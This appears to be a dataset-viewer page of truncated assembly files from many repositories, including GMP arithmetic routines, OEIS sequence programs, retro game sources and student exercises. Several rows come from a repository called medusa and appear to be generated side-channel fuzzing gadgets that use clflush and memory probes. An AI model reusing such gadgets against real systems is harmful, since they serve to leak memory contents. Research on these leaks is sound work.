Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xa0_notsx.log_21829_1802.asm | ljhsiun2/medusa | 9 | 203664 | <reponame>ljhsiun2/medusa
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r8
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_normal_ht+0x7c5a, %r8
nop
add %rcx, %rcx
mov (%r8), %rdi
nop
nop
nop
nop
xor $15937, %r11
lea addresses_normal_ht+0x6c31, %rsi
lea addresses_A_ht+0x1741a, %rdi
clflus... |
1-source-files/original-sources/1.d.asm | markmoxon/elite-a-beebasm | 16 | 203667 | <filename>1-source-files/original-sources/1.d.asm
\ This file replicates the following part of the original Elite-A build process:
\
\ *lo.:0.tcode
\ *lo.:0.S.T
\ *sa.:0.1.D 11e3 6000
ORG &11E3
INCBIN "output/tcode"
ORG &5600
INCBIN "original_source_files/S.T"
SAVE "output/1.D", &11E3, &6000
|
code/seagullbird/t31.asm | KongoHuster/assembly-exercise | 1 | 203668 | <filename>code/seagullbird/t31.asm<gh_stars>1-10
TITLE seagullbird_t31
.MODEL SMALL
.DATA
A DB 3
B DB 3
.CODE
MAIN PROC FAR
ASSUME CS:_TEXT, DS:_DATA
PUSH DS
XOR AX, AX
PUSH AX
MOV AX, @DATA
MOV DS, AX
MOV AL, 01H
MOV AH, AL
LEA BX, A
AND AL, [BX] ; AL 存 A 的最低位
AND AH, [BX+1] ; AH 存 B 的最低位
A... |
release/src/router/gmp/source/mpn/x86_64/com_n.asm | zhoutao0712/rtn11pb1 | 12 | 203670 | dnl AMD64 mpn_com_n.
dnl Copyright 2004, 2005, 2006 Free Software Foundation, Inc.
dnl This file is part of the GNU MP Library.
dnl The GNU MP Library is free software; you can redistribute it and/or modify
dnl it under the terms of the GNU Lesser General Public License as published
dnl by the Free Software Fo... |
Transynther/x86/_processed/AVXALIGN/_st_sm_/i9-9900K_12_0xa0_notsx.log_21829_126.asm | ljhsiun2/medusa | 9 | 203671 | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r14
push %r15
push %r8
push %r9
push %rax
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x11f73, %r9
nop
xor %r8, %r8
mov (%r9), %r14w
nop
nop
and $9434, %rax
lea addresses_A_ht+0x16fb3, %r14
clflush (%r14)
nop
nop
nop
dec %rsi
movb $0x61, (%r14)
nop
nop
... |
programs/oeis/290/A290113.asm | jmorken/loda | 1 | 203672 | ; A290113: Decimal representation of the diagonal from the corner to the origin of the n-th stage of growth of the two-dimensional cellular automaton defined by "Rule 643", based on the 5-celled von Neumann neighborhood.
; 1,3,5,13,29,61,125,253,509,1021,2045,4093,8189,16381,32765,65533,131069,262141,524285,1048573,209... |
Gas/GAZ/GZ.asm | Gabidal/GAS_Pack | 1 | 203673 | %include "Zinclude"
loadSprite player, "R/player.gr"
main text
;_-_-_-_-_-_-_-_-_-_-_
startCanvas
drawSprite player, 10, 10
drawSprite player, 5, 5
;_-_-_-_-_-_-_-_-_-_-_
int 21h |
base/mvdm/wow16/user/winstr.asm | npocmaka/Windows-Server-2003 | 17 | 203674 | <filename>base/mvdm/wow16/user/winstr.asm
;++
;
; WOW v1.0
;
; Copyright (c) 1991, Microsoft Corporation
;
; WINSTR.ASM
; Win16 string services
;
; History:
;
; Created 18-Jun-1991 by <NAME> (jeffpar)
; Copied from WIN31 and edited (as little as possible) for WOW16
;--
;*****************... |
oeis/265/A265129.asm | neoneye/loda-programs | 11 | 203675 | <reponame>neoneye/loda-programs<filename>oeis/265/A265129.asm<gh_stars>10-100
; A265129: Triangle read by rows, formed as the sum of the two versions of the natural numbers filling an equilateral triangle.
; Submitted by <NAME>
; 2,5,5,10,10,10,17,17,17,17,26,26,26,26,26,37,37,37,37,37,37,50,50,50,50,50,50,50,65,65,65,... |
libsrc/stdio/abc800/fgetc_cons.asm | meesokim/z88dk | 0 | 203677 | ;
; ABC800 Routines
;
; getkey() Wait for keypress
;
; Oct. 2007 - <NAME>
;
;
; $Id: fgetc_cons.asm,v 1.2 2015/01/19 01:33:17 pauloscustodio Exp $
;
PUBLIC fgetc_cons
.fgetc_cons
call 2
ld l,a
ld h,0
ret
|
Sem4/AEIE_LAB/my1sim85-0.6.2/asm/testz2.asm | SOUMEE2000/Heritage-CSE-Codes | 0 | 203678 | <gh_stars>0
ORG 0000H
LXI SP,3FF0H
MVI A,05H
MOV B,A
MOV C,B
MOV D,C
MOV E,D
INR A
STA 2050H
INR A
LXI H,2051H
MOV M,A
LDA 2050H
INR A
INX H
MOV M,A
RST 1
HLT |
src/shaders/h264/ildb/AVC_ILDB_Luma_Core.asm | me176c-dev/android_hardware_intel-vaapi-driver | 192 | 203679 | /*
* Copyright © <2010>, Intel Corporation.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the
* "Software"), to deal in the Software without restriction, including
* without limitation the rights to use, copy, modify, merg... |
Transynther/x86/_processed/NONE/_xt_sm_/i7-7700_9_0x48_notsx.log_21829_1182.asm | ljhsiun2/medusa | 9 | 203680 | <reponame>ljhsiun2/medusa
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r13
push %r14
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_normal_ht+0x18a4d, %rsi
nop
nop
nop
nop
nop
cmp $14137, %r11
movups (%rsi), %xmm5
vpextrq $0, %xmm5, %r14
nop
nop
nop
nop
dec %r13
lea addresses_D_ht+0xadf... |
05.minMaxUsingArray.asm | tamim87/Assembly-Samples | 0 | 203681 | <filename>05.minMaxUsingArray.asm
;Finding maximum and minimum using array
;Roll : 1807087
org 100h
mov si,offset input ;move starting address of array into si
mov cx,len ;store length into cx for controling loop
mov dh,00h ;take dh for storing maximum
mov dl,0fh ;take dl for storin... |
third-party/gmp/gmp-src/mpn/x86_64/core2/aorsmul_1.asm | jhh67/chapel | 1,602 | 203682 | dnl x86-64 mpn_addmul_1 and mpn_submul_1, optimized for "Core 2".
dnl Copyright 2003-2005, 2007-2009, 2011, 2012 Free Software Foundation, Inc.
dnl This file is part of the GNU MP Library.
dnl
dnl The GNU MP Library is free software; you can redistribute it and/or modify
dnl it under the terms of either:
dnl
dnl... |
firmware/coreboot/3rdparty/blobs/cpu/amd/geode_lx/gplvsa_ii/vsm_lib/descr.asm | fabiojna02/OpenCellular | 1 | 203683 | ;
; Copyright (c) 2006-2008 Advanced Micro Devices,Inc. ("AMD").
;
; This library is free software; you can redistribute it and/or modify
; it under the terms of the GNU Lesser General Public License as
; published by the Free Software Foundation; either version 2.1 of the
; License, or (at your option) any lat... |
oeis/189/A189887.asm | neoneye/loda-programs | 11 | 203685 | <reponame>neoneye/loda-programs
; A189887: Dimension of homogeneous component of degree n in x in the Malcev-Poisson superalgebra S^tilde(M).
; 1,1,2,3,4,6,9,11,12,14,17,19,20,22,25,27,28,30,33,35,36,38,41,43,44,46,49,51,52,54,57,59,60,62,65,67,68,70,73,75,76,78,81,83,84,86,89,91,92,94,97,99,100,102,105,107,108,110,113... |
programs/oeis/058/A058888.asm | neoneye/loda | 22 | 203686 | ; A058888: Number of terms in the set invphi(2*p(n)), where p(n) is the n-th prime.
; 4,4,2,0,2,0,0,0,2,2,0,0,2,0,0,2,0,0,0,0,0,0,2,2,0,0,0,0,0,2,0,2,0,0,0,0,0,0,0,2,2,0,2,0,0,0,0,0,0,0,2,2,0,2,0,0,0,0,0,2,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,2,0,2,0,0,2,0,0,0,0,0,0,0,2,0,0,2,0,0,0
mov $1,2
lpb $0
mov $1,$0
mod... |
programs/quake/q1source/QW/client/sys_wina.asm | chaos4ever/chaos-old | 0 | 203687 | .386P
.model FLAT
externdef _d_zistepu:dword
externdef _d_pzbuffer:dword
externdef _d_zistepv:dword
externdef _d_zrowbytes:dword
externdef _d_ziorigin:dword
externdef _r_turb_s:dword
externdef _r_turb_t:dword
externdef _r_turb_pdest:dword
externdef _r_turb_spancount:dword
externdef _r_turb_turb:d... |
source/extension/option_x16/sound/soundsync.asm | paulscottrobson/6502-basic | 3 | 203688 | <filename>source/extension/option_x16/sound/soundsync.asm
; ************************************************************************************************
; ************************************************************************************************
;
; Name: soundsync.asm
; Purpose: Sound sync/update code
; ... |
ee/wman/ersmsq.asm | olifink/smsqe | 0 | 203689 | ; Window manager point to error string SMSQ special
section wman
xdef wm_ersmsq
wm_ersmsq
xdef wm_erstr
include 'dev8_keys_qdos_sms'
;+++
; Convert error in d0 to string
;
; d0 cr error code
; a1 r pointer to error string
; status return according to D0
;+++
wm_erstr
move.l d0,-(sp)
move.l d0,a1
moveq #sms.m... |
Assembly/helloworld-input.asm | fengjixuchui/NASM-Assembly-Linux-Notes | 22 | 203690 | <reponame>fengjixuchui/NASM-Assembly-Linux-Notes<filename>Assembly/helloworld-input.asm
; Hello World Program (Getting input)
; Compile with: nasm -f elf helloworld-input.asm
; Link with (64 bit systems require elf_i386 option): ld -m elf_i386 helloworld-input.o -o helloworld-input
; Run with: ./helloworld-input
%inc... |
C/BiosLib/putchcol.asm | p-k-p/SysToolsLib | 232 | 203691 | PAGE ,132
TITLE System utilities, not relying on MS-DOS.
;*****************************************************************************;
; ;
; FILE NAME: PUTCHCOL.ASM ;
; ;
; DESCRIPTION: Routine to display a string with a given color attribute ;
; ;
; ... |
Transynther/x86/_processed/US/_zr_/i7-7700_9_0x48.log_21829_2555.asm | ljhsiun2/medusa | 9 | 203692 | <reponame>ljhsiun2/medusa
.global s_prepare_buffers
s_prepare_buffers:
push %r13
push %r15
push %r8
push %rax
push %rbp
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0x101e, %rbp
clflush (%rbp)
nop
nop
sub $29116, %r15
mov (%rbp), %r13
nop
nop
and $33382, %r8
lea addresses_WT_ht+0x17a34, %rcx
xor %rbx, %rb... |
src/test/ref/pointer-pointer-2.asm | jbrandwood/kickc | 2 | 203693 | <reponame>jbrandwood/kickc<filename>src/test/ref/pointer-pointer-2.asm
// Tests pointer to pointer in a more complex setup
// Commodore 64 PRG executable file
.file [name="pointer-pointer-2.prg", type="prg", segments="Program"]
.segmentdef Program [segments="Basic, Code, Data"]
.segmentdef Basic [start=$0801]
.segmen... |
PIC/Ejecutor/Ejecutor.asm | MrRomo/MrBootloader | 0 | 203694 | <reponame>MrRomo/MrBootloader
_readData:
;Ejecutor.c,3 :: unsigned char readData() {
;Ejecutor.c,5 :: PORTB = 0x00;
CLRF PORTB+0
;Ejecutor.c,6 :: while (1){
L_readData0:
;Ejecutor.c,7 :: if(UART1_Data_Ready()){
CALL _UART1_Data_Ready+0
MOVF R0+0, 0
BTFSC STATUS+0, 2
GOTO L_re... |
target/cos_117/disasm/iop_overlay1/STATCL.asm | jrrk2/cray-sim | 49 | 203695 | <gh_stars>10-100
0x0000 (0x000000) 0x2104- f:00020 d: 260 | A = OR[260]
0x0001 (0x000002) 0x290D- f:00024 d: 269 | OR[269] = A
0x0002 (0x000004) 0x2104- f:00020 d: 260 | A = OR[260]
0x0003 (0x000006) 0x1403- f:00012 d: 3 | A = A + 3 (0x0... |
libsrc/stdio_new/file/fgetc.asm | meesokim/z88dk | 8 | 203696 | ; int __FASTCALL__ fgetc(FILE *stream)
; 05.2008 aralbrec
PUBLIC fgetc
PUBLIC ASMDISP_FGETC
EXTERN l_jpix, stdio_error_mc, stdio_error_eacces_mc
INCLUDE "../stdio.def"
.fgetc
push hl
pop ix
.asmentry
; enter : ix = FILE *
; exit : a = hl = char and carry reset for success
; hl = -1 and car... |
mystery.asm | emanuelbrici/Assembly | 0 | 203697 | <filename>mystery.asm
;<NAME>
;4/7/2015
SECTION .data
prompt: db "Enter 10 digits: "
plen: equ $-prompt
SECTION .bss
digits: equ 10 ;set digits to 10 permanently
inbuf: resb digits + 2 ;resevse space for 12 bytes
SECTION .text
global _start
_start:
nop
mov eax, 4 ; write
mov ebx, 1 ; to ... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.